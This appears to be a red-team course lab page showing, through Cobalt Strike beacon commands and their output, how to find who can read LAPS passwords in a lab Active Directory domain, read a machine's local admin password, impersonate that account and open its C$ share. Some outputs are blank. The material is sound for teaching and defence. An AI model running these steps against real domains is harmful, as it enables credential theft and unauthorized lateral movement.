Reading ms-Mcs-AdmPwd

We can discover which principals are allowed to read the ms-Mcs-AdmPwd attribute by reading its DACL on each computer object.

beacon> powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier

ObjectDN                                                      SecurityIdentifier                          
--------                                                      ------------------                          
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io         S-1-5-21-569305411-121244042-2357301523-1107
CN=WEB,OU=Web Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io   S-1-5-21-569305411-121244042-2357301523-1108
CN=SQL-2,OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io         S-1-5-21-569305411-121244042-2357301523-1107

beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1108
DEV\Support Engineers


Dedicated tooling such as the LAPSToolkit also exist. Find-LAPSDelegatedGroups will query each OU and find domain groups that have delegated read access.

beacon> powershell-import C:\Tools\LAPSToolkit\LAPSToolkit.ps1
beacon> powershell Find-LAPSDelegatedGroups

OrgUnit                                              Delegated Groups     
-------                                              ----------------     
OU=Workstations,DC=dev,DC=cyberbotic,DC=io           DEV\Developers       
OU=Servers,DC=dev,DC=cyberbotic,DC=io                DEV\Support Engineers
OU=Web Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io DEV\Support Engineers
OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io DEV\Support Engineers


Find-AdmPwdExtendedRights goes a little deeper and queries each individual computer for users that have "All Extended Rights". This will reveal any users that can read the attribute without having had it specifically delegated to them.

To get a computer's password, simply read the attribute.

beacon> getuid
[*] You are DEV\bfarmer

beacon> powershell Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd



The make_token command is an easy way to leverage it.

beacon> make_token .\LapsAdmin 1N3FyjJR5L18za
[+] Impersonated DEV\bfarmer

beacon> ls \\wkstn-1\c$
[*] Listing: \\wkstn-1\c$\

Size     Type    Last Modified         Name
----     ----    -------------         ----
          dir     08/16/2022 08:17:30   $Recycle.Bin
          dir     08/15/2022 22:22:31   $WinREAgent
          dir     01/27/2022 18:18:49   Documents and Settings
          dir     12/07/2019 09:14:52   PerfLogs
          dir     08/22/2022 00:15:03   Program Files
          dir     10/06/2021 13:57:25   Program Files (x86)
          dir     09/14/2022 09:50:27   ProgramData
          dir     08/17/2022 17:52:54   Recovery
          dir     09/14/2022 09:35:54   System Volume Information
          dir     08/16/2022 08:15:58   Users
          dir     09/09/2022 10:38:50   Windows
 8kb      fil     09/14/2022 08:12:19   DumpStack.log.tmp
 796mb    fil     09/14/2022 08:12:19   hiberfil.sys
 704mb    fil     09/14/2022 08:12:19   pagefile.sys
 16mb     fil     09/14/2022 08:12:19   swapfile.sys

Last updated